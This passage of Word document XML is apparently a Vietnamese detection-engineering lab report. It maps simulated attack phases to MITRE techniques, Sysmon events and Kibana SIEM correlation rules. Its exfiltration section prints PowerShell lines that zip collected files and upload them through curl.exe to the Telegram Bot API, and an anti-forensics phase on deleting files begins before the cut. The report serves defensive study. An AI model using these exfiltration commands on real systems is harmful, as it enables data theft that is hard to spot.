      </w:r>
      <w:r w:rsidRPr="00451CA5">
        <w:t>Sysmon EventID 1 ghi nhận arp.exe được spawn bởi powershell.exe với user=SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586FBB3B" w14:textId="77777777" w:rsidR="00104BF2" w:rsidRDefault="00104BF2" w:rsidP="00104BF2"/>
    <w:p w14:paraId="3EADA413" w14:textId="77777777" w:rsidR="00104BF2" w:rsidRDefault="00104BF2" w:rsidP="00104BF2">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00104BF2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D8A01FE" wp14:editId="47233898">
            <wp:extent cx="6120130" cy="3553460"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="198146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67829" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="3553460"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D96FD21" w14:textId="6E43AD1A" w:rsidR="00104BF2" w:rsidRDefault="00104BF2" w:rsidP="00104BF2">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="006D2C1A">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">0: </w:t>
      </w:r>
      <w:r w:rsidRPr="00062E60">
        <w:t>Sysmon EventID 11 ghi nhận nhiều file được tạo trong C:\Windows\Temp\wdmp\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D442434" w14:textId="77777777" w:rsidR="00104BF2" w:rsidRDefault="00104BF2" w:rsidP="00104BF2">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00104BF2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7EF033EE" wp14:editId="33F7A394">
            <wp:extent cx="6120130" cy="2330450"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="15168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8898" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="2330450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="72729FA2" w14:textId="5BD4D8CB" w:rsidR="00104BF2" w:rsidRPr="00104BF2" w:rsidRDefault="00104BF2" w:rsidP="00104BF2">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure 11: </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA64BF">
        <w:t>Alert C3 — WMI Consumer Activated + Discovery xuất hiện trong Kibana SIEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9A538A" w14:textId="77777777" w:rsidR="00104BF2" w:rsidRDefault="00104BF2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E34B7F" w14:textId="0F8DD112" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Phase 6 — Exfiltration (T1560.001 + T1041)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01B4A" w14:paraId="4131BB11"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02D41358" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MITRE Technique</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CF6C008" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1560.001 — Archive via Utility; T1041 — Exfiltration Over C2 Channel</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="6D9F7FE9"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2BE24296" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MITRE Tactic</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2212BF1" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>TA0009 — Collection (Archive); TA0010 — Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="6ECD0E76"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1AFAF2CD" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Sysmon Event ID</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8415E58" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>EID 11 (FileCreate — wdmp.zip), EID 3 (NetworkConnect — Telegram API)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="2D815849"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4BB0C36C" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Log Source</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745D821" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Microsoft-Windows-Sysmon/Operational</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="12CEB619"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5624AA61" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ECS Field chính</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7A93E7A" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>file.extension, file.path, destination.ip, destination.port, user.name</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="12D3D21E"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1F2CA684" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Mức độ nguy hiểm</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EFCC9BB" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Critical — risk_score: 99</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="633091CD" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00B01B4A">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59565B8F" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>svhw.ps1 nén toàn bộ staging directory thành wdmp.zip (EventID 11), sau đó sử dụng curl.exe để upload file lên Telegram Bot API và Invoke-RestMethod để gửi tin nhắn embed. Traffic đến api.telegram.org:443 là HTTPS hợp lệ, không thể phân biệt với Telegram thông thường nếu không có SSL inspection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610360FA" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00B01B4A">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59AC4377" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="thick" w:sz="10" w:space="0" w:color="555555"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="80" w:line="256" w:lineRule="auto"/>
        <w:ind w:left="240" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t># svhw.ps1 — Exfiltration qua Telegram Bot API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A5149B"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1814592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T1560.001: Archive — sinh EID 11 (wdmp.zip)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FABD9CB"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Compress-Archive -Path "$wd\*" -DestinationPath $zp -Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECF3149"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4DA2B6F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T1041: Upload file ZIP bang curl.exe — sinh EID 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76527F84"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curl.exe: binary co san tren Windows 10+ (C:\Windows\System32\curl.exe)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F2DDF8"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$curlCmd = "curl.exe -s -F chat_id=$chatId"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613A460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 -F document=@`"$zp`""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139DCA6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 -F caption=`"Exfil: $($zipInfo.Name) ($([math]::Round($zipInfo.Length/1MB,2)) MB)`""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276A599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 https://api.telegram.org/bot$botToken/sendDocument"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FBA19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Invoke-Expression $curlCmd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1173E0E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2586A6E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Gui thong bao summary qua Invoke-RestMethod — sinh EID 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BCAD6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$body = @{chat_id=$chatId; text=$summary} | ConvertTo-Json -Compress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16541917"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Invoke-RestMethod -Uri "https://api.telegram.org/bot$botToken/sendMessage"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3353395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-Method Post -Body $body -ContentType "application/json"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACB51A4"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0507B94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Correlation Rule C4 bat sequence:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145C85B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EID 11 (non-zip staging) -&gt; EID 11 (zip) -&gt; EID 3 (outbound HTTPS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A669E11" w14:textId="1E22A2FA" w:rsidR="00B01B4A" w:rsidRDefault="00000000" w:rsidP="00104BF2">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="thick" w:sz="10" w:space="0" w:color="555555"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="80" w:line="256" w:lineRule="auto"/>
        <w:ind w:left="240" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t># maxspan=2m, process.name=powershell.exe, user.name=SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B2DCD1" w14:textId="77777777" w:rsidR="00104BF2" w:rsidRDefault="00104BF2" w:rsidP="00104BF2">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r w:rsidRPr="00104BF2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64099F7A" wp14:editId="526F97E2">
            <wp:extent cx="6120130" cy="3523615"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="15964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2416" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="3523615"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="60387070" w14:textId="096CC906" w:rsidR="00104BF2" w:rsidRDefault="00104BF2" w:rsidP="00104BF2">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t>Figure 1</w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="006D2C1A">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00943DCC">
        <w:t>Sysmon EventID 11 ghi nhận wdmp.zip được tạo trong C:\Windows\Temp\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F35E02D" w14:textId="77777777" w:rsidR="00433F43" w:rsidRDefault="00433F43" w:rsidP="00433F43"/>
    <w:p w14:paraId="5BEF8DF0" w14:textId="77777777" w:rsidR="00433F43" w:rsidRDefault="00433F43" w:rsidP="00433F43">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00433F43">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07AE9A3D" wp14:editId="62B03401">
            <wp:extent cx="6120130" cy="3470275"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="120906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62759" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="3470275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E220122" w14:textId="3B6A277B" w:rsidR="00433F43" w:rsidRDefault="00433F43" w:rsidP="00433F43">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t>Figure 1</w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="006D2C1A">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A96ACD">
        <w:t>Sysmon EventID 3 ghi nhận powershell.exe / curl.exe kết nối đến api.telegram.org:443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA37289" w14:textId="77777777" w:rsidR="00433F43" w:rsidRDefault="00433F43" w:rsidP="00433F43"/>
    <w:p w14:paraId="6027652E" w14:textId="77777777" w:rsidR="00433F43" w:rsidRDefault="00433F43" w:rsidP="00433F43">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00433F43">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E11C1DB" wp14:editId="237FC216">
            <wp:extent cx="6120130" cy="3553460"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="153793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31367" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="3553460"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D49008" w14:textId="17EC2749" w:rsidR="00433F43" w:rsidRDefault="00433F43" w:rsidP="00433F43">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t>Figure 1</w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="006D2C1A">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidRPr="00433F43">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A96ACD">
        <w:t xml:space="preserve">Sysmon EventID </w:t>
      </w:r>
      <w:r>
        <w:t>22</w:t>
      </w:r>
      <w:r w:rsidRPr="00A96ACD">
        <w:t xml:space="preserve"> ghi </w:t>
      </w:r>
      <w:r w:rsidRPr="00433F43">
        <w:t>DNS query</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A96ACD">
        <w:t>kết nối đến api.telegram.org</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D4A6F2" w14:textId="77777777" w:rsidR="00433F43" w:rsidRPr="00433F43" w:rsidRDefault="00433F43" w:rsidP="00433F43"/>
    <w:p w14:paraId="34411D73" w14:textId="77777777" w:rsidR="00433F43" w:rsidRDefault="00433F43" w:rsidP="00433F43">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00433F43">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B617028" wp14:editId="2C1520D3">
            <wp:extent cx="6120130" cy="2773680"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="188645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58929" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="2773680"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="77522E5D" w14:textId="4CA29D5D" w:rsidR="00433F43" w:rsidRDefault="00433F43" w:rsidP="00433F43">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t>Figure 1</w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="006D2C1A">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C2681D">
        <w:t>Telegram Bot nhận file ZIP và summary message — xác nhận exfiltration thành công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEB9BD9" w14:textId="77777777" w:rsidR="00433F43" w:rsidRDefault="00433F43" w:rsidP="00433F43"/>
    <w:p w14:paraId="0D98B889" w14:textId="77777777" w:rsidR="00433F43" w:rsidRDefault="00433F43" w:rsidP="00433F43">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00433F43">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4DC8337A" wp14:editId="27FB3A6C">
            <wp:extent cx="6120130" cy="2346960"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="68024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48035" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="2346960"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6B8D2B" w14:textId="54A36C31" w:rsidR="00B01B4A" w:rsidRDefault="00433F43" w:rsidP="00433F43">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t>Figure 1</w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="006D2C1A">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>6</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00800311">
        <w:t>Alert C4 — File Collection → Archive → Exfiltration xuất hiện trong Kibana SIEM với severity=Critical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04329441" w14:textId="77777777" w:rsidR="00104BF2" w:rsidRDefault="00104BF2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C13A715" w14:textId="1183B139" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Phase 7 — Defense Evasion (T1070.004): Indicator Removal on Host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01B4A" w14:paraId="694C2979"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68FD78DD" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MITRE Technique</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F12A4E1" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1070.004 — Indicator Removal on Host: File Deletion</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="7681E208"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29DFE9B7" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MITRE Tactic</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E15D465" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>TA0005 — Defense Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="48E8DBAD"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6FC947B6" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Sysmon Event ID</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7D1063C" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>EID 23 — FileDelete (wdmp\, wdmp.zip, svhw.ps1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="618B3E3C"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28405850" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Log Source</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788AE15" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Microsoft-Windows-Sysmon/Operational</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="3373AEAB"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35DF5F23" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ECS Field chính</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551854D" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>file.path, file.extension, process.name, user.name</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="75B0931C" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
            <w:tcMar>
              <w:top w:w="70" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7800ABD6" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
